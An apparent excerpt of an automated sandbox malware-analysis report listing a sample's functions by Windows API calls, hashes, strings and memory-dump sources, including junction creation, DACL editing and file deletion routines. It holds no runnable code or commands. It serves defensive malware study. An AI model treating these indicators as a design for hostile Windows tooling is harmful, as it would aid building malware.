                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2454019100d95f0aa331bd4eb5a40280b694dfb6b7ca835368b931441977791
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35519D711043049FC704EF10D88196AB7F8FF88758F1499ADF899A72A1DB31EE06CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EDA852
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EDA874
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EDA8B1
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EDA8D6
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EDA8F5
                                                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 00EDA931
                                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EDA966
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EDA971
                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00EDA97A
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EDA984
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                                                                                                                                      • API String ID: 2733774712-3457252023
                                                                                                                                                                                                                                      • Opcode ID: b59d65b9fd4078c13eeee381fca7e1ad1b1b56f750486b85243b6db797ea0002
                                                                                                                                                                                                                                      • Instruction ID: 684a6465b0d5b29ecc89bb0e81d331f6b454741ba37388d970f1368d17655684
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b59d65b9fd4078c13eeee381fca7e1ad1b1b56f750486b85243b6db797ea0002
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3931A17190021AABDB219FA0DC49FEB73BCFF89700F1451B6F908E6160EB7097459B25
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00EF982C,?,?), ref: 00EFC0C8
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC0DF
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC0EA
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC0F7
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC100
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC10F
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC118
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC11F
                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC130
                                                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F03C7C,?), ref: 00EFC149
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00EFC159
                                                                                                                                                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00EFC17D
                                                                                                                                                                                                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00EFC1A8
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00EFC1D0
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EFC1E6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3840717409-0
                                                                                                                                                                                                                                      • Opcode ID: dc3baa0e81bca854fb5dc89f414e53a158ebe7922b4dfa9f8f8b0694a9f546f2
                                                                                                                                                                                                                                      • Instruction ID: 2c4cc08f4bfa9b8d70082567ef773e719d42d473f14142edd5f51994b3da1300
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc3baa0e81bca854fb5dc89f414e53a158ebe7922b4dfa9f8f8b0694a9f546f2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2641397560120CEFDB219F64DD88EAA7BB9FF89715F204058FA05E7260DB309941EB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00EDE053
                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00EDE06B
                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00EDE07D
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EDE092
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDE0A6
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00EDE0BE
                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00EDE0D8
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDE0EA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                      • API String ID: 34673085-438819550
                                                                                                                                                                                                                                      • Opcode ID: b79b62692bdff3eceefadad2a5683e646f1f578cf00df01bd4901ec58efba0dd
                                                                                                                                                                                                                                      • Instruction ID: e421c0d7188caa936395ef37cc216dd979e01a2787be236b461b4466adf28185
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b79b62692bdff3eceefadad2a5683e646f1f578cf00df01bd4901ec58efba0dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D8163716083459FCB24EF64C8449AAB7E8EF99314F14A82FF48AE7351E730D946CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EFC8A4
                                                                                                                                                                                                                                      • GetFocus.USER32 ref: 00EFC8B4
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00EFC8BF
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EFC9EA
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EFCA15
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00EFCA35
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00EFCA48
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EFCA7C
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EFCAC4
                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EFCAFC
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00EFCB31
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 1296962147-4108050209
                                                                                                                                                                                                                                      • Opcode ID: df1f3c23c19acf4f27c91fd09e26db41e4e0a1be40f51a2753ed08f431a5b6e8
                                                                                                                                                                                                                                      • Instruction ID: e8fc2de02b247831c5e842d759f494d5cd7ef9e0802392f3eba22488d0b8d885
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df1f3c23c19acf4f27c91fd09e26db41e4e0a1be40f51a2753ed08f431a5b6e8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2818D7020830D9FD720DF14CA85A7ABBE9FB88354F20591DFA99A3291D770D905DBA2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8E3C
                                                                                                                                                                                                                                        • Part of subcall function 00EC8E20: GetLastError.KERNEL32(?,00EC8900,?,?,?), ref: 00EC8E46
                                                                                                                                                                                                                                        • Part of subcall function 00EC8E20: GetProcessHeap.KERNEL32(00000008,?,?,00EC8900,?,?,?), ref: 00EC8E55
                                                                                                                                                                                                                                        • Part of subcall function 00EC8E20: HeapAlloc.KERNEL32(00000000,?,00EC8900,?,?,?), ref: 00EC8E5C
                                                                                                                                                                                                                                        • Part of subcall function 00EC8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC8E73
                                                                                                                                                                                                                                        • Part of subcall function 00EC8EBD: GetProcessHeap.KERNEL32(00000008,00EC8916,00000000,00000000,?,00EC8916,?), ref: 00EC8EC9
                                                                                                                                                                                                                                        • Part of subcall function 00EC8EBD: HeapAlloc.KERNEL32(00000000,?,00EC8916,?), ref: 00EC8ED0
                                                                                                                                                                                                                                        • Part of subcall function 00EC8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EC8916,?), ref: 00EC8EE1
                                                                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EC8B2E
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EC8B43
                                                                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EC8B62
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00EC8B73
                                                                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00EC8BB0
                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EC8BCC
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00EC8BE9
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EC8BF8
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00EC8BFF
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EC8C20
                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00EC8C27
                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EC8C58
                                                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EC8C7E
                                                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EC8C92
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3996160137-0
                                                                                                                                                                                                                                      • Opcode ID: 3e75d1178a4957595abd1bb0069aaa7549dd693823d2e26165321ba82beb6898
                                                                                                                                                                                                                                      • Instruction ID: 3c5959cc345be6eedc1159558a431ac94ada8676ecdbd501426358a4a0c57d77
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e75d1178a4957595abd1bb0069aaa7549dd693823d2e26165321ba82beb6898
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87614775900209AFDF10DFA4DF45FEEBBB9FF04304F04816AE915A6290DB369A06DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00EE7A79
                                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EE7A85
                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00EE7A91
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00EE7A9E
                                                                                                                                                                                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EE7AF2
                                                                                                                                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00EE7B2E
                                                                                                                                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EE7B52
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000006,?), ref: 00EE7B5A
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00EE7B63
                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000006), ref: 00EE7B6A
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00EE7B75
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                      • Opcode ID: 8848c5720291d9ca9c3abf71a1c8cd06d5a926a59c1b5d5945a44ffe6bcc898f
                                                                                                                                                                                                                                      • Instruction ID: 67043cfa6cc901d6c04b374662c29016d75a6e829ca4e70675bd659633e6acd4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8848c5720291d9ca9c3abf71a1c8cd06d5a926a59c1b5d5945a44ffe6bcc898f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD514B71904249EFDB14CFA9CC85FAEBBB9FF48310F14842DF999A7250D731A9419B60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00EDA4D4
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 00EDA4F6
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EDA54F
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EDA568
                                                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 00EDA61E
                                                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 00EDA63C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                      • API String ID: 311963372-2391861430
                                                                                                                                                                                                                                      • Opcode ID: 490e43b7052cc6fc8ee3bc56820b1bd0ba47b4d9ab44fc9687063205aaf6773a
                                                                                                                                                                                                                                      • Instruction ID: c4853d9d15bac18350b0cc98d09b4dc5e100de61a35680484384db9ecdfc1540
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 490e43b7052cc6fc8ee3bc56820b1bd0ba47b4d9ab44fc9687063205aaf6773a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE517F71800219AACF15FBA0DD46EEEB7BDEF04340F1411A6F509B21A2DB316F5ADB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00ED951A: __time64.LIBCMT ref: 00ED9524
                                                                                                                                                                                                                                        • Part of subcall function 00E84A8C: _fseek.LIBCMT ref: 00E84AA4
                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00ED97EF
                                                                                                                                                                                                                                        • Part of subcall function 00E9431E: __wsplitpath_helper.LIBCMT ref: 00E9435E
                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00ED9802
                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00ED9815
                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00ED983A
                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00ED9850
                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00ED9863
                                                                                                                                                                                                                                        • Part of subcall function 00ED9560: _memmove.LIBCMT ref: 00ED9599
                                                                                                                                                                                                                                        • Part of subcall function 00ED9560: _memmove.LIBCMT ref: 00ED95A8
                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00ED97AA
                                                                                                                                                                                                                                        • Part of subcall function 00ED9CF1: _wcscmp.LIBCMT ref: 00ED9DE1
                                                                                                                                                                                                                                        • Part of subcall function 00ED9CF1: _wcscmp.LIBCMT ref: 00ED9DF4
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ED9A0D
                                                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 00ED9A80
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?), ref: 00ED9AB6
                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ED9ACC
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED9ADD
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED9AEF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1500180987-0
                                                                                                                                                                                                                                      • Opcode ID: 7d83bbdf502daa24dc936b30418d431450d7bdbd19c3b760a90c4ddc3f8adb18
                                                                                                                                                                                                                                      • Instruction ID: 7d36237aa1741dd7bb18972449a5307ed8afc13f55af109e507728a7d70723e6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d83bbdf502daa24dc936b30418d431450d7bdbd19c3b760a90c4ddc3f8adb18
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2EC13DB1900219AADF25DFA5CC85EDEB7BDEF45300F0050ABF609F6251EB309A858F65
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00E85BF1
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00F37890), ref: 00EC0E7B
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00F37890), ref: 00EC0F2B
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EC0F6F
                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00EC0F78
                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(00F37890,00000000,?,00000000,00000000,00000000), ref: 00EC0F8B
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00EC0F97
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
